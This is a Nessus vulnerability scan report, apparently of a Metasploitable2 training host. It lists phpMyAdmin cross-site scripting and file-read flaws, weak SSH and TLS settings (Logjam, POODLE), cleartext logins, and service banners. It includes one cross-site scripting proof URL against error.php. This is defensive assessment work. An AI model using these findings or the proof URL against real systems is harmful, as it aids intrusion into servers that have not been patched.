Remove the affected file(s).

Medium

5.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

5.0 (CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)

Published: 2003/02/12, Modified: 2024/11/22

Nessus discovered the following URLs that call phpinfo() :

- http://metasploitable2.sicurform/phpinfo.php
- http://metasploitable2.sicurform/mutillidae/phpinfo.php

The remote web server hosts a PHP script that is prone to a cross- site scripting attack.

The version of phpMyAdmin fails to validate BBcode tags in user input to the 'error' parameter of the 'error.php' script before using it to generate dynamic HTML.

An attacker may be able to leverage this issue to inject arbitrary HTML or script code into a user's browser to be executed within the security context of the affected site. For example, this could be used to cause a page with arbitrary text and a link to an external site to be displayed.

Upgrade to phpMyAdmin 3.4.0-beta1 or later.

Medium

3.8

0.0823

4.3 (CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N)

3.7 (CVSS2#E:H/RL:OF/RC:C)

Published: 2011/01/06, Modified: 2022/04/11

Nessus was able to exploit the issue using the following URL :

http://metasploitable2.sicurform/phpMyAdmin/error.php?type=phpmyadmin_pmasa_2010_9.nasl&error=%5ba%40https%3a%2f%2fwww.phpmyadmin.net%2fsecurity%2fPMASA-2010-9%2f%40_self%5dClick%20here%5b%2fa%5d

The remote web server contains a PHP script that is affected by multiple issues.

The version of phpMyAdmin installed on the remote host fails to sanitize user-supplied input to the 'file_path' parameter of the 'bs_disp_as_mime_type.php' script before using it to read a file and reporting it in dynamically-generated HTML. An unauthenticated, remote attacker may be able to leverage this issue to read arbitrary files, possibly from third-party hosts, or to inject arbitrary HTTP headers in responses sent to third-party users.

Note that the application is also reportedly affected by several other issues, although Nessus has not actually checked for them.

Upgrade to phpMyAdmin 3.1.3.1 or apply the patch referenced in the project's advisory.

Medium

5.0 (CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)

3.7 (CVSS2#E:U/RL:OF/RC:C)

Published: 2009/04/03, Modified: 2022/04/11

The remote web server contains a PHP application that has a cross- site scripting vulnerability.

The setup script included with the version of phpMyAdmin installed on the remote host does not properly sanitize user-supplied input to the 'verbose server name' field.

A remote attacker could exploit this by tricking a user into executing arbitrary script code.

Upgrade to phpMyAdmin 3.3.7 or later.

Medium

3.0

0.0039

4.3 (CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N)

3.7 (CVSS2#E:H/RL:OF/RC:C)

Published: 2010/09/08, Modified: 2022/04/11

By making a series of requests, Nessus was able to determine the
following phpMyAdmin installation is vulnerable :

http://metasploitable2.sicurform/phpMyAdmin/

It is possible to determine the exact time set on the remote host.

The remote host answers to an ICMP timestamp request. This allows an attacker to know the date that is set on the targeted machine, which may assist an unauthenticated, remote attacker in defeating time-based authentication protocols.

Timestamps returned from machines running Windows Vista / 7 / 2008 / 2008 R2 are deliberately incorrect, but usually within 1000 seconds of the actual system time.

Filter out the ICMP timestamp requests (13), and the outgoing ICMP timestamp replies (14).

Low

2.2

0.0037

2.1 (CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:N)

Published: 1999/08/01, Modified: 2024/10/07

The remote clock is synchronized with the local clock.

The SSH server is configured to use Cipher Block Chaining.

The SSH server is configured to support Cipher Block Chaining (CBC) encryption. This may allow an attacker to recover the plaintext message from the ciphertext.

Note that this plugin only checks for the options of the SSH server and does not check for vulnerable software versions.

Contact the vendor or consult product documentation to disable CBC mode cipher encryption, and enable CTR or GCM cipher mode encryption.

Low

3.7 (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N)

1.4

0.0307

2.6 (CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N)

1.9 (CVSS2#E:U/RL:OF/RC:C)

Published: 2013/10/28, Modified: 2023/10/27

The following client-to-server Cipher Block Chaining (CBC) algorithms
are supported :

3des-cbc
aes128-cbc
aes192-cbc
aes256-cbc
blowfish-cbc
cast128-cbc
rijndael-cbc@lysator.liu.se

The following server-to-client Cipher Block Chaining (CBC) algorithms
are supported :

3des-cbc
aes128-cbc
aes192-cbc
aes256-cbc
blowfish-cbc
cast128-cbc
rijndael-cbc@lysator.liu.se

The remote SSH server is configured to allow weak key exchange algorithms.

The remote SSH server is configured to allow key exchange algorithms which are considered weak.

This is based on the IETF draft document Key Exchange (KEX) Method Updates and Recommendations for Secure Shell (SSH) RFC9142. Section 4 lists guidance on key exchange algorithms that SHOULD NOT and MUST NOT be enabled. This includes:

diffie-hellman-group-exchange-sha1

diffie-hellman-group1-sha1

gss-gex-sha1-*

gss-group1-sha1-*

gss-group14-sha1-*

rsa1024-sha1

Note that this plugin only checks for the options of the SSH server, and it does not check for vulnerable software versions.

Contact the vendor or consult product documentation to disable the weak algorithms.

Low

3.7 (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N)

2.6 (CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N)

Published: 2021/10/13, Modified: 2024/03/22

The following weak key exchange algorithms are enabled :

diffie-hellman-group-exchange-sha1
diffie-hellman-group1-sha1

The remote SSH server is configured to allow MD5 and 96-bit MAC algorithms.

The remote SSH server is configured to allow either MD5 or 96-bit MAC algorithms, both of which are considered weak.

Note that this plugin only checks for the options of the SSH server, and it does not check for vulnerable software versions.

Contact the vendor or consult product documentation to disable MD5 and 96-bit MAC algorithms.

Low

2.6 (CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N)

Published: 2013/11/22, Modified: 2016/12/14

The following client-to-server Message Authentication Code (MAC) algorithms
are supported :

hmac-md5
hmac-md5-96
hmac-sha1-96

The following server-to-client Message Authentication Code (MAC) algorithms
are supported :

hmac-md5
hmac-md5-96
hmac-sha1-96

The remote host allows SSL/TLS connections with one or more Diffie-Hellman moduli less than or equal to 1024 bits.

The remote host allows SSL/TLS connections with one or more Diffie-Hellman moduli less than or equal to 1024 bits. Through cryptanalysis, a third party may be able to find the shared secret in a short amount of time (depending on modulus size and attacker resources). This may allow an attacker to recover the plaintext or potentially violate the integrity of connections.

Reconfigure the service to use a unique Diffie-Hellman moduli of 2048 bits or greater.

Low

3.7 (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N)

3.2 (CVSS:3.0/E:U/RL:O/RC:C)

4.5

0.9403

2.6 (CVSS2#AV:N/AC:H/Au:N/C:N/I:P/A:N)

1.9 (CVSS2#E:U/RL:OF/RC:C)

Published: 2015/05/28, Modified: 2024/09/11

Vulnerable connection combinations :

SSL/TLS version : SSLv3
Cipher suite : TLS1_CK_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
Diffie-Hellman MODP size (bits) : 512
Logjam attack difficulty : Easy (could be carried out by individuals)

SSL/TLS version : TLSv1.0
Cipher suite : TLS1_CK_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
Diffie-Hellman MODP size (bits) : 512
Logjam attack difficulty : Easy (could be carried out by individuals)

The remote host supports a set of weak ciphers.

The remote host supports EXPORT_DHE cipher suites with keys less than or equal to 512 bits. Through cryptanalysis, a third party can find the shared secret in a short amount of time.

A man-in-the middle attacker may be able to downgrade the session to use EXPORT_DHE cipher suites. Thus, it is recommended to remove support for weak cipher suites.

Reconfigure the service to remove support for EXPORT_DHE cipher suites.

Low

3.7 (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N)

3.2 (CVSS:3.0/E:U/RL:O/RC:C)

4.5

0.9403

2.6 (CVSS2#AV:N/AC:H/Au:N/C:N/I:P/A:N)

2.2 (CVSS2#E:U/RL:ND/RC:C)

Published: 2015/05/21, Modified: 2022/12/05

EXPORT_DHE cipher suites supported by the remote server :

Low Strength Ciphers (<= 64-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
EXP-EDH-RSA-DES-CBC-SHA 0x00, 0x14 DH(512) RSA DES-CBC(40) SHA1 export
EXP-ADH-DES-CBC-SHA 0x00, 0x19 DH(512) None DES-CBC(40) SHA1 export
EXP-ADH-RC4-MD5 0x00, 0x17 DH(512) None RC4(40) MD5 export

The fields above are :

{Tenable ciphername}
{Cipher ID code}
Kex={key exchange}
Auth={authentication}
Encrypt={symmetric encryption method}
MAC={message authentication code}
{export flag}

It is possible to obtain sensitive information from the remote host with SSL/TLS-enabled services.

The remote host is affected by a man-in-the-middle (MitM) information disclosure vulnerability known as POODLE. The vulnerability is due to the way SSL 3.0 handles padding bytes when decrypting messages encrypted using block ciphers in cipher block chaining (CBC) mode.
MitM attackers can decrypt a selected byte of a cipher text in as few as 256 tries if they are able to force a victim application to repeatedly send the same data over newly created SSL 3.0 connections.

As long as a client and service both support SSLv3, a connection can be 'rolled back' to SSLv3, even if TLSv1 or newer is supported by the client and service.

The TLS Fallback SCSV mechanism prevents 'version rollback' attacks without impacting legacy clients; however, it can only protect connections when the client and service support the mechanism. Sites that cannot disable SSLv3 immediately should enable this mechanism.

This is a vulnerability in the SSLv3 specification, not in any particular SSL implementation. Disabling SSLv3 is the only way to completely mitigate the vulnerability.

Disable SSLv3.

Services that must support SSLv3 should enable the TLS Fallback SCSV mechanism until SSLv3 can be disabled.

Medium

3.4 (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:N/A:N)

3.1 (CVSS:3.0/E:P/RL:O/RC:C)

5.1

0.942

4.3 (CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N)

3.4 (CVSS2#E:POC/RL:OF/RC:C)

Published: 2014/10/15, Modified: 2023/06/23

Nessus determined that the remote server supports SSLv3 with at least one CBC
cipher suite, indicating that this server is vulnerable.

It appears that TLSv1 or newer is supported on the server. However, the
Fallback SCSV mechanism is not supported, allowing connections to be "rolled
back" to SSLv3.

It is possible to obtain sensitive information from the remote host with SSL/TLS-enabled services.

The remote host is affected by a man-in-the-middle (MitM) information disclosure vulnerability known as POODLE. The vulnerability is due to the way SSL 3.0 handles padding bytes when decrypting messages encrypted using block ciphers in cipher block chaining (CBC) mode.
MitM attackers can decrypt a selected byte of a cipher text in as few as 256 tries if they are able to force a victim application to repeatedly send the same data over newly created SSL 3.0 connections.

As long as a client and service both support SSLv3, a connection can be 'rolled back' to SSLv3, even if TLSv1 or newer is supported by the client and service.

The TLS Fallback SCSV mechanism prevents 'version rollback' attacks without impacting legacy clients; however, it can only protect connections when the client and service support the mechanism. Sites that cannot disable SSLv3 immediately should enable this mechanism.

This is a vulnerability in the SSLv3 specification, not in any particular SSL implementation. Disabling SSLv3 is the only way to completely mitigate the vulnerability.

Disable SSLv3.

Services that must support SSLv3 should enable the TLS Fallback SCSV mechanism until SSLv3 can be disabled.

Medium

3.4 (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:N/A:N)

3.1 (CVSS:3.0/E:P/RL:O/RC:C)

5.1

0.942

4.3 (CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N)

3.4 (CVSS2#E:POC/RL:OF/RC:C)

Published: 2014/10/15, Modified: 2023/06/23

Nessus determined that the remote server supports SSLv3 with at least one CBC
cipher suite, indicating that this server is vulnerable.

It appears that TLSv1 or newer is supported on the server. However, the
Fallback SCSV mechanism is not supported, allowing connections to be "rolled
back" to SSLv3.

The 'autocomplete' attribute is not disabled on password fields.

The remote web server contains at least one HTML form field that has an input of type 'password' where 'autocomplete' is not set to 'off'.

While this does not represent a risk to this web server per se, it does mean that users who use the affected forms may have their credentials saved in their browsers, which could in turn lead to a loss of confidentiality if any of them use a shared host or if their machine is compromised at some point.

Add the attribute 'autocomplete=off' to these fields to prevent browsers from caching credentials.

Low

Published: 2009/10/07, Modified: 2023/07/17

Page : /phpMyAdmin/
Destination Page: /phpMyAdmin/index.php

Page : /phpMyAdmin/index.php
Destination Page: /phpMyAdmin/index.php

The 'autocomplete' attribute is not disabled on password fields.

The remote web server contains at least one HTML form field that has an input of type 'password' where 'autocomplete' is not set to 'off'.

While this does not represent a risk to this web server per se, it does mean that users who use the affected forms may have their credentials saved in their browsers, which could in turn lead to a loss of confidentiality if any of them use a shared host or if their machine is compromised at some point.

Add the attribute 'autocomplete=off' to these fields to prevent browsers from caching credentials.

Low

Published: 2009/10/07, Modified: 2023/07/17

Page : /admin/
Destination Page: /admin/j_security_check

Page : /admin/error.jsp
Destination Page: /admin/j_security_check

The remote web server might transmit credentials in cleartext.

The remote web server contains several HTML form fields containing an input of type 'password' which transmit their information to a remote web server in cleartext.

An attacker eavesdropping the traffic between web browser and server may obtain logins and passwords of valid users.

Make sure that every sensitive form transmits content over HTTPS.

Low

2.6 (CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N)

Published: 2007/09/28, Modified: 2016/11/29

Page : /phpMyAdmin/
Destination Page: /phpMyAdmin/index.php

Page : /phpMyAdmin/index.php
Destination Page: /phpMyAdmin/index.php

The remote web server might transmit credentials in cleartext.

The remote web server contains several HTML form fields containing an input of type 'password' which transmit their information to a remote web server in cleartext.

An attacker eavesdropping the traffic between web browser and server may obtain logins and passwords of valid users.

Make sure that every sensitive form transmits content over HTTPS.

Low

2.6 (CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N)

Published: 2007/09/28, Modified: 2016/11/29

Page : /admin/
Destination Page: /admin/j_security_check

Page : /admin/error.jsp
Destination Page: /admin/j_security_check

The remote web server seems to transmit credentials in cleartext.

The remote web server contains web pages that are protected by 'Basic'
authentication over cleartext.

An attacker eavesdropping the traffic might obtain logins and passwords of valid users.

Make sure that HTTP authentication is transmitted over HTTPS.

Low

2.6 (CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N)

Published: 2008/11/21, Modified: 2016/11/29

The following web pages use Basic Authentication over an unencrypted
channel :

/host-manager/html:/ realm="Tomcat Host Manager Application"
/manager/html:/ realm="Tomcat Manager Application"
/manager/status:/ realm="Tomcat Manager Application"

An X11 server is listening on the remote host

The remote host is running an X11 server. X11 is a client-server protocol that can be used to display graphical applications running on a given host on a remote client.

Since the X11 traffic is not ciphered, it is possible for an attacker to eavesdrop on the connection.

Restrict access to this port. If the X11 client/server facility is not used, disable TCP support in X11 entirely (-nolisten tcp).

Low

2.6 (CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N)

Published: 2000/05/12, Modified: 2019/03/05

X11 Version : 11.0

There is an AJP connector listening on the remote host.

The remote host is running an AJP (Apache JServ Protocol) connector, a service by which a standalone web server such as Apache communicates over TCP with a Java servlet container such as Tomcat.

n/a

None

Published: 2006/04/05, Modified: 2019/11/22

The connector listing on this port supports the ajp13 protocol.

Nessus has detected potential virtual hosts.

Hostnames different from the current hostname have been collected by miscellaneous plugins. Nessus has generated a list of hostnames that point to the remote host. Note that these are only the alternate hostnames for vhosts discovered on a web server.

Different web servers may be hosted on name-based virtual hosts.

If you want to test them, re-scan using the special vhost syntax, such as :

www.example.com[192.0.32.10]

None

Published: 2010/04/29, Modified: 2022/08/15

The following hostnames point to the remote host :
- 04cbebc48a57
- 04cbebc48a57.sicurform

The name of the Linux distribution running on the remote host was found in the banner of the web server.

Nessus was able to extract the banner of the Apache web server and determine which Linux distribution the remote host is running.

If you do not wish to display this information, edit 'httpd.conf' and set the directive 'ServerTokens Prod' and restart Apache.

None

Published: 2005/05/15, Modified: 2025/03/31

The Linux distribution detected was :
- Ubuntu 8.04 (gutsy)

It is possible to obtain the version number of the remote Apache HTTP server.

The remote host is running the Apache HTTP Server, an open source web server. It was possible to read the version number from the banner.

n/a

None

Published: 2010/07/30, Modified: 2023/08/17

URL : http://metasploitable2.sicurform/
Version : 2.2.99
Source : Server: Apache/2.2.8 (Ubuntu) DAV/2
backported : 1
modules : DAV/2
os : ConvertedUbuntu

The remote web server is an Apache Tomcat server.

Nessus was able to detect a remote Apache Tomcat web server.

NOTE: When paranoia levels are elevated, this plugin will also consider versions obtained from responses with non-200 HTTP status codes.

n/a

None

Published: 2009/06/18, Modified: 2025/05/15

URL : http://metasploitable2.sicurform:8180/
Version : 5.5
backported : 0
source : Apache Tomcat/5.5

Security patches are backported.

Security patches may have been 'backported' to the remote FTP server without changing its version number.

Banner-based checks have been disabled to avoid false positives.

Note that this test is informational only and does not denote any security problem.

n/a

None

Published: 2009/06/25, Modified: 2015/07/07

Give Nessus credentials to perform local checks.

Security patches have been backported.

Security patches may have been 'backported' to the remote PHP install without changing its version number.

Banner-based checks have been disabled to avoid false positives.

Note that this test is informational only and does not denote any security problem.

n/a

None

Published: 2015/07/07, Modified: 2024/11/22

Give Nessus credentials to perform local checks.

Security patches are backported.

Security patches may have been 'backported' to the remote SSH server without changing its version number.

Banner-based checks have been disabled to avoid false positives.

Note that this test is informational only and does not denote any security problem.

n/a

None

Published: 2009/06/25, Modified: 2015/07/07

Give Nessus credentials to perform local checks.

Security patches are backported.

Security patches may have been 'backported' to the remote HTTP server without changing its version number.

Banner-based checks have been disabled to avoid false positives.

Note that this test is informational only and does not denote any security problem.

n/a

None

Published: 2009/06/25, Modified: 2015/07/07

Give Nessus credentials to perform local checks.

It was possible to enumerate CPE names that matched on the remote system.

By using information obtained from a Nessus scan, this plugin reports CPE (Common Platform Enumeration) matches for various hardware and software products found on a host.

Note that if an official CPE is not available for the product, this plugin computes the best possible CPE based on the information available from the scan.

n/a

None

Published: 2010/04/21, Modified: 2025/04/15

Following application CPE's matched on the remote system :

cpe:/a:apache:http_server:2.2.8 -> Apache Software Foundation Apache HTTP Server
cpe:/a:apache:http_server:2.2.99 -> Apache Software Foundation Apache HTTP Server
cpe:/a:apache:tomcat:5.5 -> Apache Software Foundation Tomcat
cpe:/a:mysql:mysql -> MySQL MySQL
cpe:/a:openbsd:openssh:4.7 -> OpenBSD OpenSSH
cpe:/a:openbsd:openssh:4.7p1 -> OpenBSD OpenSSH
cpe:/a:php:php:5.2.4 -> PHP PHP
cpe:/a:php:php:5.2.4-2ubuntu5.10 -> PHP PHP
cpe:/a:phpmyadmin:phpmyadmin:3.1.1 -> phpMYAdmin
cpe:/a:postgresql:postgresql -> PostgreSQL
cpe:/a:samba:samba:3.0.20 -> Samba Samba
cpe:/a:twiki:twiki:01_feb_2003 -> TWiki

It is possible to guess the remote device type.

Based on the remote operating system, it is possible to determine what the remote system type is (eg: a printer, router, general-purpose computer, etc).

n/a

None

Published: 2011/05/23, Modified: 2025/03/12

Remote device type : general-purpose
Confidence level : 95

This plugin gathers MAC addresses from various sources and consolidates them into a list.

This plugin gathers MAC addresses discovered from both remote probing of the host (e.g. SNMP and Netbios) and from running local checks (e.g. ifconfig). It then consolidates the MAC addresses into a single, unique, and uniform list.

n/a

None

Published: 2015/10/16, Modified: 2025/06/10

The following is a consolidated list of detected MAC addresses:
- 02:42:AC:13:00:02

Links to external sites were gathered.

Nessus gathered HREF links to external sites by crawling the remote web server.

n/a

None

Published: 2010/10/04, Modified: 2011/08/19

104 external URLs were gathered on this web server :
URL... - Seen on...


http://TWiki.org/ - /twiki/bin/view/Main/WebHome
http://TWiki.org/cgi-bin/view/Main/TWikiAdminGroup - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/Main/TWikiUsers - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/AlWilliams - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/AndreaSterbini - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/BookView - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/ChangePassword - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/ChristopheVermeulen - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/ColasNahaboo - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/CrisBailiff - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/DavidWarman - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/DontNotify - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/FileAttachment - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/FormattedSearch - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/HaroldGottschalk - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/InterwikiPlugin - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/JohnAltstadt - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/JohnTalintyre - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/KevinKinnell - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/KlausWriessnegger - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/ManagingTopics - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/ManagingWebs - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/ManpreetSingh - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/NewUserTemplate - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/NicholasLee - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/PeterFokkinga - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/PeterThoeny - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/ResetPassword - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/RichardDonkin - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/RyanFreebern - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/StanleyKnutson - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/SvenDowideit - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/TWikiAccessControl - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/TWikiAccessControl#SuperAdminGroup - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/TWikiDocumentation - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/TWikiForms - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/TWikiFuncModule - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/TWikiMetaData - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/TWikiPlugins#PluginAPI - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/TWikiPreferences - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/TWikiRegistration - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/TWikiSkins - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/TWikiTemplates - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/TWikiUserAuthentication - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/TWikiVariables - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/TextFormattingFAQ - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/TextFormattingRules - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/WebChanges - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/WebNotify - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/WebPreferences - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/WebSearch - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/WebStatistics - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/WikiName - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/WikiNotation - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/WikiTopic - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/WikiWikiClones - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/WikiWord - /twiki/TWikiHistory.html
http://en.wikipedia.org/wiki/Robots_exclusion_standard - /mutillidae/
http://irongeek.com - /mutillidae/
http://php.net/mcrypt - /phpMyAdmin/
http://samurai.inguardians.com/ - /mutillidae/
http://twiki.org/cgi-bin/view/Codev.DocRequest - /twiki/TWikiHistory.html
http://twiki.org/cgi-bin/view/Codev.DocsToDo - /twiki/TWikiHistory.html
http://twiki.org/cgi-bin/view/Codev.FeatureBrainstorming - /twiki/TWikiHistory.html
http://twiki.org/cgi-bin/view/Codev.FeatureDocumented - /twiki/TWikiHistory.html
http://twiki.org/cgi-bin/view/Codev.FeatureDone - /twiki/TWikiHistory.html
http://twiki.org/cgi-bin/view/Codev.FeatureEnhancementRequest - /twiki/TWikiHistory.html
http://twiki.org/cgi-bin/view/Codev.FeatureToDo - /twiki/TWikiHistory.html
http://twiki.org/cgi-bin/view/Codev.FeatureUnderConstruction - /twiki/TWikiHistory.html
http://twiki.org/cgi-bin/view/Codev.ReadmeFirst - /twiki/TWikiHistory.html
http://twiki.org/cgi-bin/view/Codev/AttachedNotificationLinksBug - /twiki/TWikiHistory.html
http://twiki.org/cgi-bin/view/Codev/AuthenticationBasedOnGroups - /twiki/TWikiHistory.html
http://twiki.org/cgi-bin/view/Codev/BetterTWikiTagTemplateProcessing - /twiki/TWikiHistory.html
http://twiki.org/cgi-bin/view/Codev/CreateLinkToAttachedFileBug - /twiki/TWikiHistory.html
http://twiki.org/cgi-bin/view/Codev/FileAttachmentFilterSecurityAlert - /twiki/TWikiHistory.html
http://twiki.org/cgi-bin/view/Codev/IncludeHandlingImprovements - /twiki/TWikiHistory.html
http://twiki.org/cgi-bin/view/Codev/TWikiSkins - /twiki/TWikiHistory.html
http://twiki.org/cgi-bin/view/Codev/UppercaseAttachments - /twiki/TWikiHistory.html
http://www.backtrack-linux.org/ - /mutillidae/
http://www.eclipse.org/pdt/ - /mutillidae/
http://www.hackersforcharity.org/ - /mutillidae/
http://www.hackersforcharity.org/ghdb/ - /mutillidae/
http://www.irongeek.com - /mutillidae/
http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10 - /mutillidae/
http://www.owasp.org/index.php/Top_10_2007-A3 - /mutillidae/
http://www.owasp.org/index.php/Top_10_2007-A6 - /mutillidae/
http://www.owasp.org/index.php/Top_10_2010-A1 - /mutillidae/
http://www.owasp.org/index.php/Top_10_2010-A10 - /mutillidae/
http://www.owasp.org/index.php/Top_10_2010-A2 - /mutillidae/
http://www.owasp.org/index.php/Top_10_2010-A3 - /mutillidae/
http://www.owasp.org/index.php/Top_10_2010-A4 - /mutillidae/
http://www.owasp.org/index.php/Top_10_2010-A5 - /mutillidae/
http://www.owasp.org/index.php/Top_10_2010-A6 - /mutillidae/
http://www.owasp.org/index.php/Top_10_2010-A7 - /mutillidae/
http://www.owasp.org/index.php/Top_10_2010-A8 - /mutillidae/
http://www.owasp.org/index.php/Top_10_2010-A9 - /mutillidae/
http://www.php.net/ - /mutillidae/
http://www.phpmyadmin.net - /phpMyAdmin/
http://www.quest.com/toad-for-mysql/ - /mutillidae/
http://www.youtube.com/user/webpwnized - /mutillidae/
https://addons.mozilla.org/en-US/firefox/collections/jdruin/pro-web-developer-qa-pack/ - /mutillidae/
https://twitter.com/webpwnized - /mutillidae/
https://www.owasp.org - /mutillidae/
https://www.owasp.org/index.php/Top_Ten - /mutillidae/

Links to external sites were gathered.

Nessus gathered HREF links to external sites by crawling the remote web server.

n/a

None

Published: 2010/10/04, Modified: 2011/08/19

112 external URLs were gathered on this web server :
URL... - Seen on...


http://ant.apache.org - /tomcat-docs/manager-howto.html
http://ant.apache.org/bindownload.cgi - /tomcat-docs/building.html
http://apache.apache.org/ - /tomcat-docs/appdev/index.html
http://apr.apache.org/ - /tomcat-docs/apr.html
http://httpd.apache.org/docs/2.2/mod/mod_proxy_ajp.html - /tomcat-docs/config/ajp.html
http://httpd.apache.org/docs/2.2/mod/mod_ssl.html#sslcacertificatefile - /tomcat-docs/apr.html
http://httpd.apache.org/docs/2.2/mod/mod_ssl.html#sslcacertificatepath - /tomcat-docs/apr.html
http://httpd.apache.org/docs/2.2/mod/mod_ssl.html#sslcarevocationfile - /tomcat-docs/apr.html
http://httpd.apache.org/docs/2.2/mod/mod_ssl.html#sslcarevocationpath - /tomcat-docs/apr.html
http://httpd.apache.org/docs/2.2/mod/mod_ssl.html#sslcertificatechainfile - /tomcat-docs/apr.html
http://httpd.apache.org/docs/howto/ssi.html#basicssidirectives - /tomcat-docs/ssi-howto.html
http://issues.apache.org/bugzilla/buglist.cgi?bug_status=UNCONFIRMED&bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&bug_status=RESOLVED&resolution=LATER&resolution=REMIND&resolution=---&bugidtype=include&product=Tomcat+5&cmdtype=doit&order=Importance - /
http://issues.apache.org/bugzilla/show_bug.cgi?id=22679 - /tomcat-docs/ssl-howto.html
http://issues.apache.org/bugzilla/show_bug.cgi?id=34643 - /tomcat-docs/ssl-howto.html
http://issues.apache.org/bugzilla/show_bug.cgi?id=37668 - /tomcat-docs/config/context.html
http://issues.apache.org/bugzilla/show_bug.cgi?id=38217 - /tomcat-docs/ssl-howto.html
http://issues.apache.org/bugzilla/show_bug.cgi?id=39013 - /tomcat-docs/config/context.html
http://jakarta.apache.org/commons - /tomcat-docs/jndi-resources-howto.html
http://jakarta.apache.org/commons/dbcp/configuration.html - /tomcat-docs/jndi-datasource-examples-howto.html
http://jakarta.apache.org/commons/logging - /tomcat-docs/logging.html
http://jakarta.apache.org/regexp/ - /tomcat-docs/config/context.html
http://jakarta.apache.org/site/downloads/downloads_commons-logging.cgi - /tomcat-docs/logging.html
